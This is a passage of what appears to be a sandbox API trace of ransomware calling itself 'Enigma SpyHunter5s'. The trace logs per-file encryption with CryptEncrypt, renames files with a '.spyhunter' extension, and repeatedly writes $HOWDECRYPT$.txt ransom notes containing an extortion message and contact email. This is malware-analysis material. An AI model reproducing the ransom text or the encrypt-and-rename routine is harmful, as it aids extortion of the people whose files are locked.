lpNumberOfBytesRead=0x248fd4c, lpOverlapped=0x0 | out: lpBuffer=0x2c26128*, lpNumberOfBytesRead=0x248fd4c*=0x2800, lpOverlapped=0x0) returned 1 [0092.855] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.855] WriteFile (in: hFile=0x17c, lpBuffer=0x2c26128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248fd4c, lpOverlapped=0x0 | out: lpBuffer=0x2c26128*, lpNumberOfBytesWritten=0x248fd4c*=0x2800, lpOverlapped=0x0) returned 1 [0092.855] GetProcessHeap () returned 0x2c0000 [0092.855] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c26128 | out: hHeap=0x2c0000) returned 1 [0092.856] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.856] WriteFile (in: hFile=0x17c, lpBuffer=0x248fd8c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fd4c, lpOverlapped=0x0 | out: lpBuffer=0x248fd8c*, lpNumberOfBytesWritten=0x248fd4c*=0x4, lpOverlapped=0x0) returned 1 [0093.006] WriteFile (in: hFile=0x17c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fd4c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248fd4c*=0x30, lpOverlapped=0x0) returned 1 [0093.006] CloseHandle (hObject=0x17c) returned 1 [0093.007] GetProcessHeap () returned 0x2c0000 [0093.007] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c21098 [0093.007] wnsprintfW (in: pszDest=0x2c21098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM.spyhunter") returned 87 [0093.007] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbendf98.chm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbendf98.chm.spyhunter")) returned 1 [0093.007] GetProcessHeap () returned 0x2c0000 [0093.008] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c21098 | out: hHeap=0x2c0000) returned 1 [0093.008] GetProcessHeap () returned 0x2c0000 [0093.008] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0093.008] GetProcessHeap () returned 0x2c0000 [0093.008] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x377d38 | out: hHeap=0x2c0000) returned 1 [0093.008] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fd90 | out: pbBuffer=0x248fd90) returned 1 [0093.008] GetProcessHeap () returned 0x2c0000 [0093.008] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0093.008] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248fd88*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248fd88*=0x30) returned 1 [0093.008] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_widescreen_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangle_widescreen_thumbnail.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.011] GetProcessHeap () returned 0x2c0000 [0093.011] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0093.011] GetProcessHeap () returned 0x2c0000 [0093.011] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34f148 | out: hHeap=0x2c0000) returned 1 [0093.011] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fd88 | out: pbBuffer=0x248fd88) returned 1 [0093.011] GetProcessHeap () returned 0x2c0000 [0093.011] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0093.011] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248fd80*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248fd80*=0x30) returned 1 [0093.011] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_travel_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangle_travel_thumbnail.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.025] GetProcessHeap () returned 0x2c0000 [0093.025] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0093.025] GetProcessHeap () returned 0x2c0000 [0093.025] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3780d8 | out: hHeap=0x2c0000) returned 1 [0093.025] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fd88 | out: pbBuffer=0x248fd88) returned 1 [0093.025] GetProcessHeap () returned 0x2c0000 [0093.025] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0093.025] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248fd80*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248fd80*=0x30) returned 1 [0093.025] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_videoinset.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shadowonlyframe_videoinset.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.025] GetProcessHeap () returned 0x2c0000 [0093.026] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0093.026] GetProcessHeap () returned 0x2c0000 [0093.026] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x378390 | out: hHeap=0x2c0000) returned 1 [0093.026] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fd80 | out: pbBuffer=0x248fd80) returned 1 [0093.026] GetProcessHeap () returned 0x2c0000 [0093.026] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0093.026] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248fd78*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248fd78*=0x30) returned 1 [0093.026] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_selectionsubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shadowonlyframe_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.026] GetProcessHeap () returned 0x2c0000 [0093.026] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0093.026] GetProcessHeap () returned 0x2c0000 [0093.026] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3555a0 | out: hHeap=0x2c0000) returned 1 [0093.026] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fd80 | out: pbBuffer=0x248fd80) returned 1 [0093.026] GetProcessHeap () returned 0x2c0000 [0093.026] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0093.026] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248fd78*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248fd78*=0x30) returned 1 [0093.026] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_buttongraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shadowonlyframe_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.026] GetProcessHeap () returned 0x2c0000 [0093.026] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0093.026] GetProcessHeap () returned 0x2c0000 [0093.026] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34f508 | out: hHeap=0x2c0000) returned 1 [0093.027] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fd78 | out: pbBuffer=0x248fd78) returned 1 [0093.027] GetProcessHeap () returned 0x2c0000 [0093.027] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0093.027] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248fd70*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248fd70*=0x30) returned 1 [0093.027] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\scene_button_style_default_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\scene_button_style_default_thumbnail.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.027] GetProcessHeap () returned 0x2c0000 [0093.027] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0093.027] GetProcessHeap () returned 0x2c0000 [0093.027] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35a160 | out: hHeap=0x2c0000) returned 1 [0093.027] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xcc [0093.075] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0093.076] WriteFile (in: hFile=0xcc, lpBuffer=0x248fcab*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248fdd4, lpOverlapped=0x0 | out: lpBuffer=0x248fcab*, lpNumberOfBytesWritten=0x248fdd4*=0x127, lpOverlapped=0x0) returned 1 [0093.087] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0093.087] WriteFile (in: hFile=0xcc, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248fdd4, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248fdd4*=0x2ac, lpOverlapped=0x0) returned 1 [0093.088] CloseHandle (hObject=0xcc) returned 1 [0093.088] GetProcessHeap () returned 0x2c0000 [0093.088] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3782a8 | out: hHeap=0x2c0000) returned 1 [0093.088] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fd70 | out: pbBuffer=0x248fd70) returned 1 [0093.088] GetProcessHeap () returned 0x2c0000 [0093.088] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0093.088] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fd68*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fd68*=0x30) returned 1 [0093.088] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\MSB1FREN.ITS" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\fren\\msb1fren.its"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xcc [0093.089] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\MSB1FREN.ITS") returned 77 [0093.089] StrStrW (lpFirst="MSB1FREN.ITS", lpSrch=".txt") returned 0x0 [0093.089] GetProcessHeap () returned 0x2c0000 [0093.089] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c21098 [0093.089] ReadFile (in: hFile=0xcc, lpBuffer=0x2c21098, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fd2c, lpOverlapped=0x0 | out: lpBuffer=0x2c21098*, lpNumberOfBytesRead=0x248fd2c*=0x2800, lpOverlapped=0x0) returned 1 [0093.091] SetFilePointerEx (in: hFile=0xcc, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.091] WriteFile (in: hFile=0xcc, lpBuffer=0x2c21098*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248fd2c, lpOverlapped=0x0 | out: lpBuffer=0x2c21098*, lpNumberOfBytesWritten=0x248fd2c*=0x2800, lpOverlapped=0x0) returned 1 [0093.091] GetProcessHeap () returned 0x2c0000 [0093.092] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c21098 | out: hHeap=0x2c0000) returned 1 [0093.092] SetFilePointerEx (in: hFile=0xcc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.092] WriteFile (in: hFile=0xcc, lpBuffer=0x248fd6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fd2c, lpOverlapped=0x0 | out: lpBuffer=0x248fd6c*, lpNumberOfBytesWritten=0x248fd2c*=0x4, lpOverlapped=0x0) returned 1 [0093.190] WriteFile (in: hFile=0xcc, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fd2c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248fd2c*=0x30, lpOverlapped=0x0) returned 1 [0093.190] CloseHandle (hObject=0xcc) returned 1 [0095.320] GetProcessHeap () returned 0x2c0000 [0095.320] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x30efc0 [0095.320] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\MSB1FREN.ITS.spyhunter") returned 87 [0095.321] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\MSB1FREN.ITS" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\fren\\msb1fren.its"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\MSB1FREN.ITS.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\fren\\msb1fren.its.spyhunter")) returned 1 [0095.321] GetProcessHeap () returned 0x2c0000 [0095.321] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30efc0 | out: hHeap=0x2c0000) returned 1 [0095.321] GetProcessHeap () returned 0x2c0000 [0095.321] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0095.321] GetProcessHeap () returned 0x2c0000 [0095.321] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x377c50 | out: hHeap=0x2c0000) returned 1 [0095.321] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\internet explorer\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0095.337] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0095.337] WriteFile (in: hFile=0x170, lpBuffer=0x248fca3*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248fdcc, lpOverlapped=0x0 | out: lpBuffer=0x248fca3*, lpNumberOfBytesWritten=0x248fdcc*=0x127, lpOverlapped=0x0) returned 1 [0095.338] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0095.338] WriteFile (in: hFile=0x170, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248fdcc, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248fdcc*=0x2ac, lpOverlapped=0x0) returned 1 [0095.338] CloseHandle (hObject=0x170) returned 1 [0095.339] GetProcessHeap () returned 0x2c0000 [0095.339] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32a0b8 | out: hHeap=0x2c0000) returned 1 [0095.339] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fd68 | out: pbBuffer=0x248fd68) returned 1 [0095.339] GetProcessHeap () returned 0x2c0000 [0095.339] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0095.339] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fd60*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fd60*=0x30) returned 1 [0095.339] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\strand.exe" (normalized: "c:\\program files\\internet explorer\\strand.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.339] GetProcessHeap () returned 0x2c0000 [0095.339] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0095.339] GetProcessHeap () returned 0x2c0000 [0095.339] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33d840 | out: hHeap=0x2c0000) returned 1 [0095.339] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fd68 | out: pbBuffer=0x248fd68) returned 1 [0095.339] GetProcessHeap () returned 0x2c0000 [0095.339] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0095.339] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fd60*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fd60*=0x30) returned 1 [0095.340] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\sqmapi.dll" (normalized: "c:\\program files\\internet explorer\\sqmapi.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.340] GetProcessHeap () returned 0x2c0000 [0095.340] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0095.340] GetProcessHeap () returned 0x2c0000 [0095.340] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33d790 | out: hHeap=0x2c0000) returned 1 [0095.340] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\SIGNUP\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\internet explorer\\signup\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0095.340] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0095.340] WriteFile (in: hFile=0x170, lpBuffer=0x248fc97*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248fdc0, lpOverlapped=0x0 | out: lpBuffer=0x248fc97*, lpNumberOfBytesWritten=0x248fdc0*=0x127, lpOverlapped=0x0) returned 1 [0095.341] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0095.341] WriteFile (in: hFile=0x170, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248fdc0, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248fdc0*=0x2ac, lpOverlapped=0x0) returned 1 [0095.341] CloseHandle (hObject=0x170) returned 1 [0095.341] GetProcessHeap () returned 0x2c0000 [0095.342] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d9a0 | out: hHeap=0x2c0000) returned 1 [0095.342] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fd60 | out: pbBuffer=0x248fd60) returned 1 [0095.342] GetProcessHeap () returned 0x2c0000 [0095.342] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0095.342] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fd58*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fd58*=0x30) returned 1 [0095.342] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\SIGNUP\\install.ins" (normalized: "c:\\program files\\internet explorer\\signup\\install.ins"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0095.343] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Internet Explorer\\SIGNUP\\install.ins") returned 57 [0095.343] StrStrW (lpFirst="install.ins", lpSrch=".txt") returned 0x0 [0095.343] GetProcessHeap () returned 0x2c0000 [0095.343] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c10048 [0095.343] ReadFile (in: hFile=0x170, lpBuffer=0x2c10048, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fd1c, lpOverlapped=0x0 | out: lpBuffer=0x2c10048*, lpNumberOfBytesRead=0x248fd1c*=0x1cc, lpOverlapped=0x0) returned 1 [0095.344] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xfffffe34, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.344] WriteFile (in: hFile=0x170, lpBuffer=0x2c10048*, nNumberOfBytesToWrite=0x1cc, lpNumberOfBytesWritten=0x248fd1c, lpOverlapped=0x0 | out: lpBuffer=0x2c10048*, lpNumberOfBytesWritten=0x248fd1c*=0x1cc, lpOverlapped=0x0) returned 1 [0095.344] GetProcessHeap () returned 0x2c0000 [0095.344] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c10048 | out: hHeap=0x2c0000) returned 1 [0095.344] 